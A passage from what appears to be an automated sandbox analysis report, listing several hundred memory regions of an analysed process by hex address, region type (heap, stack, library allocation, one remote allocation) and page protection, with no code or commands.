page read and write
|
||
|
289A000
|
trusted library allocation
|
page read and write
|
||
|
DF0000
|
heap
|
page read and write
|
||
|
2858000
|
trusted library allocation
|
page read and write
|
||
|
4DCE000
|
trusted library allocation
|
page read and write
|
||
|
68DE000
|
stack
|
page read and write
|
||
|
106E000
|
stack
|
page read and write
|
||
|
3FAF000
|
trusted library allocation
|
page read and write
|
||
|
3170000
|
trusted library allocation
|
page read and write
|
||
|
7280000
|
trusted library allocation
|
page read and write
|
||
|
3165000
|
trusted library allocation
|
page read and write
|
||
|
6510000
|
trusted library allocation
|
page execute and read and write
|
||
|
3F21000
|
trusted library allocation
|
page read and write
|
||
|
6F7E000
|
heap
|
page read and write
|
||
|
306B000
|
trusted library allocation
|
page read and write
|
||
|
1470000
|
heap
|
page read and write
|
||
|
436E000
|
trusted library allocation
|
page read and write
|
||
|
E17000
|
trusted library allocation
|
page execute and read and write
|
||
|
DB6000
|
heap
|
page read and write
|
||
|
1464000
|
trusted library allocation
|
page read and write
|
||
|
63DF000
|
stack
|
page read and write
|
||
|
28DE000
|
trusted library allocation
|
page read and write
|
||
|
618E000
|
stack
|
page read and write
|
||
|
5520000
|
trusted library allocation
|
page read and write
|
||
|
2F80000
|
trusted library allocation
|
page read and write
|
||
|
7A4E000
|
stack
|
page read and write
|
||
|
2DFF000
|
unkown
|
page read and write
|
||
|
500C000
|
stack
|
page read and write
|
||
|
28D6000
|
trusted library allocation
|
page read and write
|
||
|
3030000
|
heap
|
page read and write
|
||
|
7830000
|
trusted library allocation
|
page read and write
|
||
|
2DBE000
|
unkown
|
page read and write
|
||
|
13D3000
|
trusted library allocation
|
page read and write
|
||
|
C8E000
|
stack
|
page read and write
|
||
|
2A98000
|
trusted library allocation
|
page read and write
|
||
|
FD5000
|
heap
|
page read and write
|
||
|
AAE000
|
heap
|
page read and write
|
||
|
B20000
|
heap
|
page read and write
|
||
|
5E00000
|
heap
|
page read and write
|
||
|
761E000
|
stack
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
CD4000
|
trusted library allocation
|
page read and write
|
||
|
64D0000
|
trusted library allocation
|
page read and write
|
||
|
284E000
|
stack
|
page read and write
|
||
|
314F000
|
stack
|
page read and write
|
||
|
671E000
|
stack
|
page read and write
|
||
|
53C6000
|
trusted library allocation
|
page read and write
|
||
|
A58E000
|
stack
|
page read and write
|
||
|
31DD000
|
trusted library allocation
|
page read and write
|
||
|
13B0000
|
trusted library allocation
|
page read and write
|
||
|
141F000
|
heap
|
page read and write
|
||
|
57E0000
|
heap
|
page read and write
|
||
|
7F8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5310000
|
heap
|
page read and write
|
||
|
3176000
|
trusted library allocation
|
page read and write
|
||
|
60B9000
|
heap
|
page read and write
|
||
|
7AA000
|
stack
|
page read and write
|
||
|
3014000
|
trusted library allocation
|
page read and write
|
||
|
29E0000
|
heap
|
page read and write
|
||
|
E02000
|
heap
|
page read and write
|
||
|
62DE000
|
stack
|
page read and write
|
||
|
D12000
|
trusted library allocation
|
page read and write
|
||
|
4B8C000
|
stack
|
page read and write
|
||
|
140B000
|
trusted library allocation
|
page execute and read and write
|
||
|
285B000
|
trusted library allocation
|
page read and write
|
||
|
136F000
|
stack
|
page read and write
|
||
|
53D2000
|
trusted library allocation
|
page read and write
|
||
|
777E000
|
heap
|
page read and write
|
||
|
6720000
|
heap
|
page read and write
|
||
|
2F1E000
|
stack
|
page read and write
|
||
|
A9AE000
|
stack
|
page read and write
|
||
|
2850000
|
trusted library allocation
|
page read and write
|
||
|
4F70000
|
trusted library allocation
|
page read and write
|
||
|
2843000
|
trusted library allocation
|
page read and write
|
||
|
59AE000
|
trusted library allocation
|
page read and write
|
||
|
AF7000
|
stack
|
page read and write
|
||
|
5BFF000
|
stack
|
page read and write
|
||
|
6530000
|
trusted library allocation
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
283B000
|
trusted library allocation
|
page read and write
|
||
|
13D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
31A9000
|
trusted library allocation
|
page read and write
|
||
|
4DF4000
|
trusted library allocation
|
page read and write
|
||
|
4F20000
|
trusted library allocation
|
page read and write
|
||
|
6500000
|
trusted library allocation
|
page execute and read and write
|
||
|
74E0000
|
heap
|
page read and write
|
||
|
53BE000
|
trusted library allocation
|
page read and write
|
||
|
4E9D000
|
stack
|
page read and write
|
||
|
3FA6000
|
trusted library allocation
|
page read and write
|
||
|
E12000
|
trusted library allocation
|
page read and write
|
||
|
64FB000
|
trusted library allocation
|
page read and write
|
||
|
382D000
|
trusted library allocation
|
page read and write
|
||
|
604F000
|
stack
|
page read and write
|
||
|
53A6000
|
trusted library allocation
|
page read and write
|
||
|
6BF0000
|
trusted library allocation
|
page read and write
|
||
|
15E2000
|
trusted library allocation
|
page read and write
|
||
|
5560000
|
heap
|
page read and write
|
||
|
5220000
|
heap
|
page execute and read and write
|
||
|
2A18000
|
trusted library allocation
|
page read and write
|
||
|
13DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CEA000
|
stack
|
page read and write
|
||
|
110E000
|
stack
|
page read and write
|
||
|
CF0000
|
trusted library allocation
|
page read and write
|
||
|
6BA6000
|
trusted library allocation
|
page read and write
|
||
|
13EE000
|
heap
|
page read and write
|
||
|
524F000
|
stack
|
page read and write
|
||
|
6F00000
|
heap
|
page read and write
|
||
|
E11000
|
heap
|
page read and write
|
||
|
57AC000
|
stack
|
page read and write
|
||
|
4DCA000
|
trusted library allocation
|
page read and write
|
||
|
2A1A000
|
trusted library allocation
|
page read and write
|
||
|
4ED9000
|
trusted library allocation
|
page read and write
|
||
|
15EA000
|
trusted library allocation
|
page execute and read and write
|
||
|
310E000
|
stack
|
page read and write
|
||
|
6A9E000
|
stack
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
3096000
|
trusted library allocation
|
page read and write
|
||
|
6BE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A3D000
|
trusted library allocation
|
page read and write
|
||
|
58C0000
|
trusted library allocation
|
page read and write
|
||
|
3160000
|
trusted library allocation
|
page read and write
|
||
|
A290000
|
heap
|
page read and write
|
||
|
52AE000
|
stack
|
page read and write
|
||
|
284C000
|
trusted library allocation
|
page read and write
|
||
|
DB4000
|
heap
|
page read and write
|
||
|
4F5E000
|
stack
|
page read and write
|
||
|
8720000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
2854000
|
trusted library allocation
|
page read and write
|
||
|
31A7000
|
heap
|
page read and write
|
||
|
4ED4000
|
trusted library allocation
|
page read and write
|
||
|
CF3000
|
trusted library allocation
|
page read and write
|
||
|
28CE000
|
trusted library allocation
|
page read and write
|
||
|
5673000
|
heap
|
page read and write
|
||
|
4199000
|
trusted library allocation
|
page read and write
|
||
|
5400000
|
trusted library allocation
|
page read and write
|
||
|
A2A0000
|
heap
|
page read and write
|
||
|
5370000
|
heap
|
page read and write
|
||
|
EC0000
|
heap
|
page read and write
|
||
|
E1B000
|
trusted library allocation
|
page execute and read and write
|
||
|
CFC000
|
unkown
|
page readonly
|
||
|
1422000
|
heap
|
page read and write
|
||
|
307E000
|
stack
|
page read and write
|
||
|
28EE000
|
trusted library allocation
|
page read and write
|
||
|
3023000
|
trusted library allocation
|
page read and write
|
||
|
53A0000
|
trusted library allocation
|
page read and write
|
||
|
39F9000
|
trusted library allocation
|
page read and write
|
||
|
2FF0000
|
trusted library allocation
|
page read and write
|
||
|
3330000
|
heap
|
page read and write
|
||
|
5BBE000
|
stack
|
page read and write
|
||
|
4DBE000
|
trusted library allocation
|
page read and write
|
||
|
1260000
|
heap
|
page read and write
|
||
|
CFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
53F0000
|
heap
|
page read and write
|
||
|
6590000
|
trusted library allocation
|
page read and write
|
||
|
57C0000
|
trusted library section
|
page readonly
|
||
|
2873000
|
trusted library allocation
|
page read and write
|
||
|
8F7000
|
stack
|
page read and write
|
||
|
2A25000
|
trusted library allocation
|
page read and write
|
||
|
4F80000
|
trusted library allocation
|
page execute and read and write
|
||
|
689F000
|
stack
|
page read and write
|
||
|
29CC000
|
stack
|
page read and write
|
||
|
316D000
|
trusted library allocation
|
page read and write
|
||
|
59A0000
|
trusted library allocation
|
page read and write
|
||
|
6A5E000
|
stack
|
page read and write
|
||
|
709F000
|
heap
|
page read and write
|
||
|
505E000
|
stack
|
page read and write
|
||
|
58BE000
|
stack
|
page read and write
|
||
|
D17000
|
trusted library allocation
|
page execute and read and write
|
||
|
73CD000
|
stack
|
page read and write
|
||
|
31A3000
|
trusted library allocation
|
page read and write
|
||
|
E40000
|
trusted library allocation
|
page execute and read and write
|
||
|
72CD000
|
stack
|
page read and write
|
||
|
305F000
|
trusted library allocation
|
page read and write
|
||
|
65E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
288A000
|
trusted library allocation
|
page read and write
|
||
|
FD0000
|
heap
|
page read and write
|
||
|
6C60000
|
trusted library allocation
|
page read and write
|
||
|
8B86000
|
trusted library allocation
|
page read and write
|
||
|
28E6000
|
trusted library allocation
|
page read and write
|
||
|
5570000
|
trusted library allocation
|
page read and write
|
||
|
315D000
|
trusted library allocation
|
page read and write
|
||
|
3120000
|
heap
|
page read and write
|
||
|
11D0000
|
heap
|
page read and write
|
||
|
4F72000
|
trusted library allocation
|
page read and write
|
||
|
3016000
|
trusted library allocation
|
page read and write
|
||
|
63E0000
|
heap
|
page read and write
|
||
|
DA8000
|
heap
|
page read and write
|
||
|
2E10000
|
heap
|
page read and write
|
||
|
2952000
|
trusted library allocation
|
page read and write
|
||
|
312B000
|
heap
|
page read and write
|
||
|
6EDCD000
|
unkown
|
page read and write
|
||
|
3010000
|
trusted library allocation
|
page read and write
|
||
|
2D9E000
|
unkown
|
page read and write
|
||
|
7840000
|
trusted library allocation
|
page read and write
|
||
|
2D5E000
|
stack
|
page read and write
|
||
|
CF0000
|
trusted library allocation
|
page read and write
|
||
|
29EA000
|
trusted library allocation
|
page read and write
|
||
|
CF2000
|
trusted library allocation
|
page read and write
|
||
|
15F0000
|
trusted library allocation
|
page read and write
|
||
|
6BA8000
|
trusted library allocation
|
page read and write
|
||
|
314C000
|
stack
|
page read and write
|
||
|
1450000
|
trusted library allocation
|
page read and write
|
||
|
11E0000
|
heap
|
page read and write
|
||
|
2FEE000
|
stack
|
page read and write
|
||
|
CE3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1420000
|
trusted library allocation
|
page read and write
|
||
|
8CCC000
|
stack
|
page read and write
|
||
|
2F90000
|
trusted library allocation
|
page read and write
|
||
|
910000
|
heap
|
page read and write
|
||
|
771E000
|
stack
|
page read and write
|
||
|
6B9E000
|
stack
|
page read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
6EDCD000
|
unkown
|
page read and write
|
||
|
41B9000
|
trusted library allocation
|
page read and write
|
||
|
30D0000
|
trusted library allocation
|
page read and write
|
||
|
A86C000
|
stack
|
page read and write
|
||
|
122D000
|
stack
|
page read and write
|
||
|
13AE000
|
stack
|
page read and write
|
||
|
775A000
|
heap
|
page read and write
|
||
|
6520000
|
trusted library allocation
|
page read and write
|
||
|
D7E000
|
heap
|
page read and write
|
||
|
1206000
|
heap
|
page read and write
|
||
|
13ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
53AB000
|
trusted library allocation
|
page read and write
|
||
|
11D8000
|
heap
|
page read and write
|
||
|
15FB000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C51000
|
trusted library allocation
|
page read and write
|
||
|
2FE8000
|
trusted library allocation
|
page read and write
|
||
|
D06000
|
trusted library allocation
|
page execute and read and write
|
||
|
13F6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7070000
|
heap
|
page read and write
|
||
|
2856000
|
trusted library allocation
|
page read and write
|
||
|
59B0000
|
heap
|
page read and write
|
||
|
882F000
|
stack
|
page read and write
|
||
|
28EA000
|
trusted library allocation
|
page read and write
|
||
|
A48F000
|
stack
|
page read and write
|
||
|
6BAB000
|
trusted library allocation
|
page read and write
|
||
|
3000000
|
trusted library allocation
|
page read and write
|
||
|
6C00000
|
trusted library allocation
|
page read and write
|
||
|
28E2000
|
trusted library allocation
|
page read and write
|
||
|
15F2000
|
trusted library allocation
|
page read and write
|
||
|
6CB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
306F000
|
trusted library allocation
|
page read and write
|
||
|
2F0E000
|
stack
|
page read and write
|
There are 587 hidden memdumps, click here to show them.